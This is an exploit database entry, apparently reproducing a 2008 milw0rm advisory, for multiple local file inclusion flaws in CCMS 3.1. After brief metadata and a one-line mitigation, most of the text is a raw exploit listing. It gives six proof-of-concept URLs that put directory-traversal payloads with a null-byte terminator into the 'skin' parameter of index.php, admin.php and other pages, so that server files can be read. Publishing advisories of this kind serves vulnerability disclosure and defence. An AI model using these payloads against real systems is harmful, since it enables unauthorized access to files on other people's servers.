CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities

vendor:

CCMS

by:

SirGod

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: CCMS

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:ccms:ccms:3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities

CCMS 3.1 is vulnerable to multiple Local File Inclusion vulnerabilities. An attacker can exploit these vulnerabilities by sending a crafted HTTP request containing malicious Local File Inclusion payloads. This can allow an attacker to read sensitive files from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

############################################################################################
[+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
############################################################################################

[+] Download Script :

   http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar

[+] Local File Inclusion

--------------------------------------------------------------------------------------------

   PoC 1 :

      http://[target]/[path]/index.php?skin=[Local File]%00

   Example 1 :

      http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00


--------------------------------------------------------------------------------------------

   PoC 2 :

      http://[target]/[path]/forums.php?skin=[Local File]%00

   Example 2 :

      http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00


--------------------------------------------------------------------------------------------

   PoC 3 :

      http://[target]/[path]/admin.php?skin=[Local File]%00

   Example 3 :

      http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

   PoC 4 :

      http://[target]/[path]/header.php?skin=[Local File]%00

   Example 4 :

      http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

   PoC 5 :

      http://[target]/[path]/pages/story.php?skin=[Local File]%00

   Example 5 :

      http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

   PoC 6 :

      http://[target]/[path]/pages/poll.php?skin=[Local File]%00

   Example 6 :

      http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00

--------------------------------------------------------------------------------------------

############################################################################################

# milw0rm.com [2008-10-03]